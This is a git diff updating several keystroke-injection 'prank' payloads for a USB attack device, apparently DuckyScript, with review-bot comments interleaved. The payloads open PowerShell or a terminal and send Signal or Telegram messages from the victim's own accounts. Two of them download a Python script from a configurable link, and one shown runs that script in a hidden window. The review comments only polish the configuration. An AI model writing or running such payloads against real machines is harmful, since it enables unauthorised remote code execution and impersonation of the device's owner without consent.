+ - Signal App installed
+Payload Plug-And-Play but can be edited as you want the message
+END_REM
REM REQUIRED - Receiver number
-DEFINE NUMBER 3332211000
+DEFINE #NUMBER 3332211000
REM REQUIRED - Message to send
-DEFINE MESSAGE YOUR_MESSAGE
+DEFINE #MESSAGE example
+
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
-DELAY 1000
GUI r
DELAY 500
-STRING powershell
-ENTER
+STRINGLN powershell
DELAY 500
-STRING Stop-Process -Name "Signal"
-ENTER
-STRING Start-Process $Env:USERPROFILE\AppData\Local\Programs\signal-desktop\Signal.exe; exit
-ENTER
+STRINGLN Stop-Process -Name "Signal"
+DELAY 500
+STRINGLN Start-Process $Env:USERPROFILE\AppData\Local\Programs\signal-desktop\Signal.exe; exit
DELAY 5000
TAB
TAB
TAB
ENTER
DELAY 100
-STRING NUMBER
+STRING #NUMBER
DELAY 100
TAB
DELAY 100
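Review bot: `DEFINE #NUMBER 3332211000` keeps a dialable-looking default, while the `#MESSAGE` define two lines below it was switched to `example`. A payload used without editing that line would presumably address the message to whoever holds that number. A placeholder that cannot be mistaken for a real recipient, such as `DEFINE #NUMBER example`, would match the other REQUIRED defines in this commit and leave an unconfigured payload with nobody to reach. The REM above it could also say so explicitly: `REM REQUIRED - Receiver number (replace the placeholder before use)`.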
@@ -44,8 +86,7 @@ DELAY 200
REM This is the message that will be sent.
REM You can change it as you want, if you want.
-STRING YOUR_MESSAGE
-ENTER
+STRINGLN #MESSAGE
REM Closing Signal App
DELAY 500
diff --git a/payloads/library/prank/SendTelegramMessages_Linux/payload.txt b/payloads/library/prank/SendTelegramMessages_Linux/payload.txt
index 10ab2b362..0d057ed32 100644
--- a/payloads/library/prank/SendTelegramMessages_Linux/payload.txt
+++ b/payloads/library/prank/SendTelegramMessages_Linux/payload.txt
@@ -1,37 +1,64 @@
-
-REM #########################################
-REM # |
-REM # Title : Send Telegram Messages |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Prank |
-REM # Target : Linux |
-REM # |
-REM #########################################
-
-REM Requirements:
-REM - Internet Connection
-REM - telegram-desktop installed and activated
-
-DELAY 1000
+REM_BLOCK
+#########################################
+# #
+# Title : Send Telegram Messages #
+# Author : Aleff #
+# Version : 1.1 #
+# Category : Prank #
+# Target : Linux #
+# #
+#########################################
+
+Requirements:
+ - Internet Connection
+ - telegram-desktop installed and activated
+END_REM
+
+REM Define the message receiver username
+DEFINE #USERNAME @example
+
+REM Define the message(s)
+DEFINE #MESSAGE1 example
+
+EXTENSION DETECT_READY
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+
+ TARGETS:
+ Any system that reflects CAPSLOCK will detect minimum required delay
+ Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #RESPONSE_DELAY 25
+ DEFINE #ITERATION_LIMIT 120
+
+ VAR $C = 0
+ WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
+ CAPSLOCK
+ DELAY #RESPONSE_DELAY
+ $C = ($C + 1)
+ END_WHILE
+ CAPSLOCK
+END_EXTENSION
+
CTRL-ALT t
DELAY 2000
-STRING telegram-desktop
-ENTER
+STRINGLN telegram-desktop
REM It depends by the computer...
DELAY 3000
-REM Define the message receiver username
-DEFINE USERNAME @example
-STRING USERNAME
-ENTER
+STRINGLN #USERNAME
DELAY 500
-REM Define the message(s)
-DEFINE MESSAGE1 example
-STRING MESSAGE1
-ENTER
+STRINGLN #MESSAGE1
DELAY 500
REM other messages here...
REM ...
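Review bot: `DELAY 3000` after `STRINGLN telegram-desktop` is the one tunable this hunk leaves as a bare literal, and its own comment says the value depends on the machine. If the application window has not taken focus by then, `#USERNAME` and `#MESSAGE1` are presumably typed into the terminal opened by `CTRL-ALT t` instead. Since the commit hoists the defines to the top of the file, the wait belongs there too, for example `DEFINE #APP_START_DELAY 3000` used as `DELAY #APP_START_DELAY`, with a REM stating what it waits for. The payload continues below this hunk.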
diff --git a/payloads/library/prank/The_Mouse_Moves_By_Itself/payload.txt b/payloads/library/prank/The_Mouse_Moves_By_Itself/payload.txt
index 9abbe927f..8c4fa422f 100644
--- a/payloads/library/prank/The_Mouse_Moves_By_Itself/payload.txt
+++ b/payloads/library/prank/The_Mouse_Moves_By_Itself/payload.txt
@@ -1,33 +1,70 @@
-REM ############################################
-REM # |
-REM # Title : The Mouse Moves By Itself |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Prank |
-REM # Target : Windows 10/11 |
-REM # |
-REM ############################################
+REM_BLOCK
+############################################
+# #
+# Title : The Mouse Moves By Itself #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Prank #
+# Target : Windows 10/11 #
+# #
+############################################
+Requirements:
+ - Internet Connection
+END_REM
-REM Requirements:
-REM - Internet Connection
+REM REQUIRED - Set your Python script link
+DEFINE #SCRIPT-PY-LINK example.com
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
-REM REQUIRED - Set your Python script link
-DEFINE SCRIPT-PY-LINK example.com
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
-DELAY 1000
GUI r
DELAY 500
-STRING powershell
-ENTER
+STRINGLN powershell
DELAY 500
-STRING Invoke-WebRequest -Uri "
-STRING SCRIPT-PY-LINK
-STRING " -OutFile "script.py"
-ENTER
+STRINGLN Invoke-WebRequest -Uri "#SCRIPT-PY-LINK" -OutFile "script.py"
DELAY 500
STRINGLN Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden
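Review bot: The new REM_BLOCK header lists only `- Internet Connection` under Requirements, yet the last line of the hunk launches `python.exe`, so the stated prerequisites are incomplete. Add `- Python` to the list, as the Try_To_Catch_Me header in this same commit does. A one-line REM above the `Invoke-WebRequest` line would also help, noting that `script.py` is written to the PowerShell session's current directory and is not removed within this hunk, since that is the artefact left on the host afterwards.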
diff --git a/payloads/library/prank/This_damn_shell_doesn_t_work___so_sad!/payload.txt b/payloads/library/prank/This_damn_shell_doesn_t_work___so_sad!/payload.txt
index e6ee5abb5..c2f036fce 100644
--- a/payloads/library/prank/This_damn_shell_doesn_t_work___so_sad!/payload.txt
+++ b/payloads/library/prank/This_damn_shell_doesn_t_work___so_sad!/payload.txt
@@ -1,15 +1,18 @@
-REM ############################################################
-REM # #
-REM # Title : This damn shell doesn't work, SO SAD! :C #
-REM # Author : Aleff #
-REM # Version : 1.0 #
-REM # Category : Prank #
-REM # Target : Linux #
-REM # #
-REM ############################################################
-
-REM Requirements:
-REM - Nothing <3
+REM_BLOCK
+############################################################
+# #
+# Title : This damn shell doesn't work, SO SAD! :C #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Prank #
+# Target : Linux #
+# #
+############################################################
+
+Requirements:
+ - Nothing <3
+END_REM
+
REM With Kali Linux 2020.4, the new default shell is now ZSH for users who install the distribution.
DEFINE #TARGET_KALI_LINUX TRUE
diff --git a/payloads/library/prank/Try_To_Catch_Me/payload.txt b/payloads/library/prank/Try_To_Catch_Me/payload.txt
index d9eb8e7a0..84d591e76 100644
--- a/payloads/library/prank/Try_To_Catch_Me/payload.txt
+++ b/payloads/library/prank/Try_To_Catch_Me/payload.txt
@@ -1,27 +1,26 @@
-REM ####################################
-REM # |
-REM # Title : Try To Catch Me |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Prank |
-REM # Target : Windows 10/11 |
-REM # |
-REM ####################################
+REM_BLOCK
+####################################
+# #
+# Title : Try To Catch Me #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Prank #
+# Target : Windows 10/11 #
+# #
+####################################
-
-REM Requirements:
-REM - Python
-REM - Internet Connection
+Requirements:
+ - Python
+ - Internet Connection
+END_REM
REM REQUIRED - Set your Python script link
DEFINE #SCRIPT-PY-LINK example.com
-
DELAY 1000
GUI r
DELAY 500
-STRING powershell
-ENTER
+STRINGLN powershell
DELAY 500
STRINGLN Invoke-WebRequest -Uri "#SCRIPT-PY-LINK" -OutFile "script.py"